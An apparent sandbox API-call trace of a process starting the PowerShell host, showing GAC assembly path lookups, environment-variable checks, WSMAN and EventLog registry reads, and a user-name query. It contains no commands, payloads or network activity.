	[0701.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0701.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0703.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0703.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0703.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0703.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0715.721] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0715.721] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0715.721] CoTaskMemFree (pv=0x1b7c98b0) 
	[0715.722] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0715.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0715.723] CoTaskMemFree (pv=0x1b7c98b0) 
	[0715.724] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0715.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0715.724] CoTaskMemFree (pv=0x1b7c98b0) 
	[0715.726] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0715.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0715.726] CoTaskMemFree (pv=0x1b7c98b0) 
	[0715.738] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0715.738] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0715.739] CoTaskMemFree (pv=0x1b7c98b0) 
	[0715.740] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0715.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0715.740] CoTaskMemFree (pv=0x1b7c98b0) 
	[0715.741] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0715.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0715.741] CoTaskMemFree (pv=0x1b7c98b0) 
	[0717.526] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5d8 | out: phkResult=0x14d5d8*=0x2f4) returned 0x0
	[0717.530] RegQueryInfoKeyW (in: hKey=0x2f4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d4dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d4d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d4dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d4d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0717.530] CoTaskMemFree (pv=0x0) 
	[0717.531] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0717.531] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x0, lpValueName=0x2917a0, lpcchValueName=0x14d588, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14d588, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0717.534] CoTaskMemFree (pv=0x2917a0) 
	[0717.534] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0717.537] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x1, lpValueName=0x2917a0, lpcchValueName=0x14d588, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14d588, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0717.537] CoTaskMemFree (pv=0x2917a0) 
	[0717.537] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0717.537] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x2, lpValueName=0x2917a0, lpcchValueName=0x14d588, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14d588, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0717.537] CoTaskMemFree (pv=0x2917a0) 
	[0717.539] RegQueryValueExW (in: hKey=0x2f4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d56c, lpData=0x0, lpcbData=0x14d568*=0x0 | out: lpType=0x14d56c*=0x1, lpData=0x0, lpcbData=0x14d568*=0x8) returned 0x0
	[0717.539] CoTaskMemAlloc (cb=0xc) returned 0x2fbee0
	[0717.539] RegQueryValueExW (in: hKey=0x2f4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d53c, lpData=0x2fbee0, lpcbData=0x14d538*=0x8 | out: lpType=0x14d53c*=0x1, lpData="2.0", lpcbData=0x14d538*=0x8) returned 0x0
	[0717.539] CoTaskMemFree (pv=0x2fbee0) 
	[0719.518] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d528 | out: phkResult=0x14d528*=0x2f8) returned 0x0
	[0719.518] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d42c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d428, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d42c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d428*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0719.518] CoTaskMemFree (pv=0x0) 
	[0719.518] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0719.518] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x0, lpValueName=0x2917a0, lpcchValueName=0x14d4d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14d4d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0719.518] CoTaskMemFree (pv=0x2917a0) 
	[0719.518] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0719.518] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x1, lpValueName=0x2917a0, lpcchValueName=0x14d4d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14d4d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0719.518] CoTaskMemFree (pv=0x2917a0) 
	[0719.518] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0719.519] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x2, lpValueName=0x2917a0, lpcchValueName=0x14d4d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14d4d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0719.519] CoTaskMemFree (pv=0x2917a0) 
	[0719.519] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d4bc, lpData=0x0, lpcbData=0x14d4b8*=0x0 | out: lpType=0x14d4bc*=0x1, lpData=0x0, lpcbData=0x14d4b8*=0x8) returned 0x0
	[0719.519] CoTaskMemAlloc (cb=0xc) returned 0x2fbce0
	[0719.519] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d48c, lpData=0x2fbce0, lpcbData=0x14d488*=0x8 | out: lpType=0x14d48c*=0x1, lpData="2.0", lpcbData=0x14d488*=0x8) returned 0x0
	[0719.519] CoTaskMemFree (pv=0x2fbce0) 
	[0719.520] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0719.520] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0719.520] CoTaskMemFree (pv=0x1b7c98b0) 
	[0721.154] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0721.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0721.155] CoTaskMemFree (pv=0x1b7c98b0) 
	[0721.160] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d558 | out: phkResult=0x14d558*=0x2fc) returned 0x0
	[0721.165] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d4cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d4c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d4cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d4c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0721.165] CoTaskMemFree (pv=0x0) 
	[0721.166] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0721.166] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x0, lpName=0x2917a0, lpcchName=0x14d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0721.166] CoTaskMemFree (pv=0x2917a0) 
	[0721.166] CoTaskMemFree (pv=0x0) 
	[0721.166] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0721.166] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x1, lpName=0x2917a0, lpcchName=0x14d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0721.166] CoTaskMemFree (pv=0x2917a0) 
	[0721.166] CoTaskMemFree (pv=0x0) 
	[0721.166] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0721.167] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x2, lpName=0x2917a0, lpcchName=0x14d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0721.167] CoTaskMemFree (pv=0x2917a0) 
	[0721.167] CoTaskMemFree (pv=0x0) 
	[0721.167] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0721.167] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x3, lpName=0x2917a0, lpcchName=0x14d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0721.167] CoTaskMemFree (pv=0x2917a0) 
	[0721.167] CoTaskMemFree (pv=0x0) 
	[0721.167] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0721.167] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x4, lpName=0x2917a0, lpcchName=0x14d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0721.167] CoTaskMemFree (pv=0x2917a0) 
	[0721.167] CoTaskMemFree (pv=0x0) 
	[0721.167] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0721.167] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x5, lpName=0x2917a0, lpcchName=0x14d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0721.167] CoTaskMemFree (pv=0x2917a0) 
	[0721.167] CoTaskMemFree (pv=0x0) 
	[0721.167] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0721.167] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x6, lpName=0x2917a0, lpcchName=0x14d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0721.168] CoTaskMemFree (pv=0x2917a0) 
	[0721.168] CoTaskMemFree (pv=0x0) 
	[0721.168] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0721.168] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x7, lpName=0x2917a0, lpcchName=0x14d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0721.168] CoTaskMemFree (pv=0x2917a0) 
	[0721.168] CoTaskMemFree (pv=0x0) 
	[0721.168] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0721.168] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x8, lpName=0x2917a0, lpcchName=0x14d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0721.168] CoTaskMemFree (pv=0x2917a0) 
	[0721.168] CoTaskMemFree (pv=0x0) 
	[0721.168] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x314) returned 0x0
	[0721.168] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x0) returned 0x2
	[0721.168] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x31c) returned 0x0
	[0721.168] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x0) returned 0x2
	[0721.169] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x320) returned 0x0
	[0721.169] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x0) returned 0x2
	[0721.169] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x324) returned 0x0
	[0721.169] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x0) returned 0x2
	[0721.169] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x328) returned 0x0
	[0721.169] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x0) returned 0x2
	[0721.169] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x32c) returned 0x0
	[0721.169] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x0) returned 0x2
	[0721.170] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x330) returned 0x0
	[0721.170] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x0) returned 0x2
	[0721.170] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x334) returned 0x0
	[0721.170] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x0) returned 0x2
	[0721.170] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x338) returned 0x0
	[0721.170] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5b8 | out: phkResult=0x14d5b8*=0x33c) returned 0x0
	[0721.170] RegCloseKey (hKey=0x33c) returned 0x0
	[0721.170] RegCloseKey (hKey=0x2fc) returned 0x0
	[0721.172] RegCloseKey (hKey=0x338) returned 0x0
	[0721.184] CoTaskMemAlloc (cb=0x804) returned 0x280660
	[0721.185] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x280660, nSize=0x14d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d7c8) returned 0x1
	[0722.634] CoTaskMemFree (pv=0x280660) 
	[0722.635] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0722.635] GetUserNameW (in: lpBuffer=0x2917a0, pcbBuffer=0x14d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d808) returned 1
	[0722.636] CoTaskMemFree (pv=0x2917a0) 
	[0724.270] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d508 | out: phkResult=0x14d508*=0x340) returned 0x0
	[0724.270] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d47c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d478, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d47c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d478*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.270] CoTaskMemFree (pv=0x0) 
	[0724.270] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.270] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.270] CoTaskMemFree (pv=0x2917a0) 
	[0724.270] CoTaskMemFree (pv=0x0) 
	[0724.270] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.270] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.270] CoTaskMemFree (pv=0x2917a0) 
	[0724.270] CoTaskMemFree (pv=0x0) 
	[0724.270] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.270] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.270] CoTaskMemFree (pv=0x2917a0) 
	[0724.271] CoTaskMemFree (pv=0x0) 
	[0724.271] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.271] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.271] CoTaskMemFree (pv=0x2917a0) 
	[0724.271] CoTaskMemFree (pv=0x0) 
	[0724.271] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.271] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.271] CoTaskMemFree (pv=0x2917a0) 
	[0724.271] CoTaskMemFree (pv=0x0) 
	[0724.271] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.271] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.271] CoTaskMemFree (pv=0x2917a0) 
	[0724.271] CoTaskMemFree (pv=0x0) 
	[0724.271] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.271] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.271] CoTaskMemFree (pv=0x2917a0) 
	[0724.272] CoTaskMemFree (pv=0x0) 
	[0724.272] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.272] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.272] CoTaskMemFree (pv=0x2917a0) 
	[0724.272] CoTaskMemFree (pv=0x0) 
	[0724.272] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0724.272] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x2917a0, lpcchName=0x14d508, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d508, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0724.272] CoTaskMemFree (pv=0x2917a0) 
	[0724.272] CoTaskMemFree (pv=0x0) 
	[0724.272] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x344) returned 0x0
	[0724.272] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.272] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x348) returned 0x0
	[0724.272] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.273] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x34c) returned 0x0
	[0724.273] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.273] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x350) returned 0x0
	[0724.273] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x0) returned 0x2
	[0724.273] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d568 | out: phkResult=0x14d568*=0x354) returned 0x0
